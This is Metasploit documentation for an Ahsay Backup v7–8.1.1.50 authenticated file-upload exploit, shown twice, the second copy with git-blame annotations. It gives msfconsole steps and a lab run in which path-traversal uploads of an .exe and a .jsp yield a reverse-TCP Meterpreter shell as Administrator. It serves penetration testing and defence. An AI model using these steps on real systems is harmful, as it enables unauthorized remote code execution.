documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md

## Vulnerable Application

  Ahsay Backup v7.x - v8.1.1.50
  Download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
  Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)

## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/windows/misc/ahsay_fileupload`
  3. enable create trial account `set CREATEACCOUNT true`
  4. set RHOST `set RHOST 172.16.238.175`
  5. set LHOST `set LHOST 172.16.238.235`
  6. run exploit `run`
  7. We should receive a meterpreter shell.

## Options

   CREATEACCOUNT  - Create a Trial account, use this when trial accounts is enabled and you do not have a valid credentials.
   PASSWORD       - Password to Ahsay useraccount, if CREATEACCOUNT is set this password will be used.
   RHOST          - Target address.
   RPORT          - The target port (TCP).
   TARGETURI      - Path to Ahsay installation
   UPLOADPATH     - Path to where the file should be uploaded
   USERNAME       - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.

## Scenarios

### Ahsay 8.1.1.50 on Windows 2003 SP2

  ```
msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run

[*] Started reverse TCP handler on 172.16.238.235:4444 
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Successfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Successfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target

meterpreter > getuid
Server username: AHSAY-123\Administrator
  ```
#12095 Added documentation 2019-07-17 12:55:18 +02:00			`## Vulnerable Application`
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00
#12095 Added documentation 2019-07-17 12:55:18 +02:00			`Ahsay Backup v7.x - v8.1.1.50`
			Download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
			Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00
#12095 Added documentation 2019-07-17 12:55:18 +02:00			`## Verification Steps`

			1. Start `msfconsole`
			2. `use exploit/windows/misc/ahsay_fileupload`
			3. enable create trial account `set CREATEACCOUNT true`
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00			4. set RHOST `set RHOST 172.16.238.175`
#12095 Added documentation 2019-07-17 12:55:18 +02:00			5. set LHOST `set LHOST 172.16.238.235`
			6. run exploit `run`
			`7. We should receive a meterpreter shell.`

			`## Options`

			`CREATEACCOUNT - Create a Trial account, use this when trial accounts is enabled and you do not have a valid credentials.`
			`PASSWORD - Password to Ahsay useraccount, if CREATEACCOUNT is set this password will be used.`
			`RHOST - Target address.`
			`RPORT - The target port (TCP).`
			`TARGETURI - Path to Ahsay installation`
			`UPLOADPATH - Path to where the file should be uploaded`
			`USERNAME - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.`

catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00			`## Scenarios`
#12095 Added documentation 2019-07-17 12:55:18 +02:00
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00			`### Ahsay 8.1.1.50 on Windows 2003 SP2`
#12095 Added documentation 2019-07-17 12:55:18 +02:00
			```
			`msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true`
			`CREATEACCOUNT => true`
			`msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175`
			`RHOST => 172.16.238.175`
			`msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235`
			`LHOST => 172.16.238.235`
			`msf exploit(windows/misc/ahsay_fileupload) > run`

			`[*] Started reverse TCP handler on 172.16.238.235:4444`
			`[+] Username and password are valid!`
			`[+] No need to create account, already exists!`
			`[*] Uploading payload`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`[+] Successfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe`
#12095 Added documentation 2019-07-17 12:55:18 +02:00			`[*] Uploading payload`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`[+] Successfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp`
#12095 Added documentation 2019-07-17 12:55:18 +02:00			`[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp`
			`[+] Exploit executed!`
			`[*] Sending stage (179779 bytes) to 172.16.238.175`
			`[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200`
			`[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target`
			`[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target`

			`meterpreter > getuid`
			`Server username: AHSAY-123\Administrator`
			```